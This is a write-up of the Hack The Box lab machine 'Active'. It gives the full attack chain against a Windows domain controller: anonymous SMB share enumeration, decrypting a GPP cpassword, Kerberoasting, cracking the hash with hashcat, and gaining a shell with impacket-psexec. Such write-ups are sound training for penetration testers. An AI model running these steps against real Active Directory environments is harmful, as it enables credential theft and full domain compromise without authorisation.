This is a walkthrough of the machine Active from Hack The Box.

Machine information:

  • Difficulty: Easy
  • OS: Windows
  • Area of interest: Enterprise Network, Vulnerability Assessment, Active Directory, Software & OS exploitation, Security Tools, Authentication
  • Vulnerability: Default Credentials, Weak Permissions, Anonymous/Guest Access
  • Technology: SMB, Kerberos
  • Technique: Reconnaissance, Password Cracking, Kerberoasting

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover that the machine is a domain controller, and that the domain name is active.htb.

SMB Enumeration

Using netexec, we discover a readable share named Replication:

netexec smb <IP> -u "" -p "" --shares

Using smbclient and anonymous login, we can enumerate the Replication share:

smbclient -N \\\\<IP>\\Replication

We discover a directory named active.htb, so we will download it to take a closer look:

RECURSE ON

PROMPT OFF

mget *

Looking at the contents, we discover a Group Policy Preferences (GPP) related file titled Groups.xml, which contains a password and the username SVC_TGS:

#active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Initial access

To obtain the password, we can pass it to gpp-decrypt:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

At this stage, you could access the Users share, where you will find the first user.txt flag. However, I moved on from here to directly obtain access as an administrator user.

Privilege escalation

With valid credentials in hand, we can attempt Kerberoasting with impacket-GetUserSPNs:

impacket-GetUserSPNs -request -outputfile hashes.txt -dc-ip <IP> active.htb/SVC_TGS

Now, we can crack Administrator's TGS with hashcat:

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force

Finally, we can get a shell on the machine using impacket-psexec and read both the user.txt and proof.txt flags:

impacket-psexec active.htb/Administrator:Ticketmaster1968@<IP>

Related Articles
Hack The Box - Jerry Writeup
An easy-rated Windows box involving default credentials for initial access into Apache Tomcat, and creating an application with a JSP webshell to obtain code execution as SYSTEM.
Hack The Box - Administrator Writeup
A medium-rated active directory box which involves chaining rights abuses to compromise users, gain access to FTP to discover a Password Safe file and execute a targeted Kerberoast and DCSync attack to compromise the domain.
Hack The Box - Return Writeup
An easy-rated active directory box involving LDAP and plaintext credentials for initial access, and abusing services to run a malicious image and obtain a SYSTEM shell.